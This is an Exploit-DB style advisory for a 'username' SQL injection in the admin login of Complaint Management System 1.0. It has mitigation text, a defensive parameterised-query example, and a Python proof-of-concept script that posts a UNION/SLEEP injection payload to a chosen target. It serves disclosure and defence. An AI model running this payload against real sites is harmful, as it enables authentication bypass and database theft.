vendor: Complaint Management System
by: Daniel Ortiz
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Complaint Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:complaint_management_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: XAMPP Version 5.6.40 / Windows 10
2020

Complaint Management System 1.0 – ‘username’ SQL Injection

An SQL injection vulnerability exists in Complaint Management System 1.0: the 'username' parameter of the admin login form (admin/index.php) is placed into an SQL query without sanitisation, so an attacker can inject arbitrary SQL through it. This can be used to bypass authentication or to retrieve sensitive data from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
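To make the mitigation concrete, here is an added example (not code from this page or from the Complaint Management System project) that mirrors an admin-login lookup in Python with sqlite3. The table name, column names and seeded row are assumptions, since the real application's schema is not on the page. `build_query_unsafe` shows how string-building lets the advisory's payload rewrite the query, while `login_safe` binds the same input as a parameter so it is only ever compared as a literal string.

```python
import sqlite3

# Payload quoted in the advisory above; used here only as test input.
ADVISORY_PAYLOAD = "ADMIN' UNION SELECT NULL,NULL,NULL,SLEEP(5)#"

# Assumed schema (not the real application's). Passwords are stored in clear
# only to keep the demo short; real code should store a salted hash.
SCHEMA = """
CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT, name TEXT);
INSERT INTO admin (username, password, name) VALUES ('admin', 'admin', 'Site Admin');
"""


def build_query_unsafe(username, password):
    """Vulnerable pattern: user input concatenated straight into the SQL text.
    Returned as a string only, to show the shape of the resulting query. On MySQL
    the '#' in the payload comments out the password check and the UNION runs."""
    return ("SELECT id, username, password, name FROM admin "
            "WHERE username = '%s' AND password = '%s'" % (username, password))


def login_safe(conn, username, password):
    """Hardened pattern: placeholders make the driver send the values separately,
    so the payload is compared as a plain string and never parsed as SQL."""
    cur = conn.execute(
        "SELECT id, username, name FROM admin WHERE username = ? AND password = ?",
        (username, password),
    )
    return cur.fetchone()


def demo_db():
    """In-memory database seeded with the assumed admin row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


if __name__ == "__main__":
    conn = demo_db()
    print("unsafe query text:", build_query_unsafe(ADVISORY_PAYLOAD, "admin"))
    print("safe lookup with payload:", login_safe(conn, ADVISORY_PAYLOAD, "admin"))
    print("safe lookup with real creds:", login_safe(conn, "admin", "admin"))
```

With parameters bound, the payload simply fails to match any username; the lookup returns nothing and the query's structure is unchanged.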

Exploit-DB raw data:

# Exploit Title: Complaint Management System 1.0 - 'username' SQL Injection
# Exploit Author: Daniel Ortiz
# Date: 2020-05-12
# Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html
# Tested on: XAMPP Version 5.6.40 / Windows 10
# Software Link:  https://www.sourcecodester.com/php/14206/complaint-management-system.html

#!/usr/bin/python

import sys
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)

# Optional proxy mapping for requests (e.g. a local intercepting proxy);
# the original script referenced this name without defining it.
proxy = None

def main():

    target = sys.argv[1]
    payload = "ADMIN' UNION SELECT NULL,NULL,NULL,SLEEP(5)#"
    url = "http://%s/cms/admin/index.php" % target

    # Format inside the call so this works on both Python 2 and 3
    print("[+] Target: %s" % target)
    print("[+] Injecting payload: %s" % payload)

    inject(url, payload)

def inject(url, payload):

    s = requests.Session()
    # The payload is sent in the 'username' field of the admin login form
    d = {'username': payload, 'password': 'admin', 'submit': ''}
    r = s.post(url, data=d, proxies=proxy)
    return r


if __name__ == '__main__':

    if len(sys.argv) != 2:
        print("(-) usage: %s  TARGET" % sys.argv[0])
        print("(-) e.g: %s  192.168.0.10" % sys.argv[0])
        sys.exit(-1)

    main()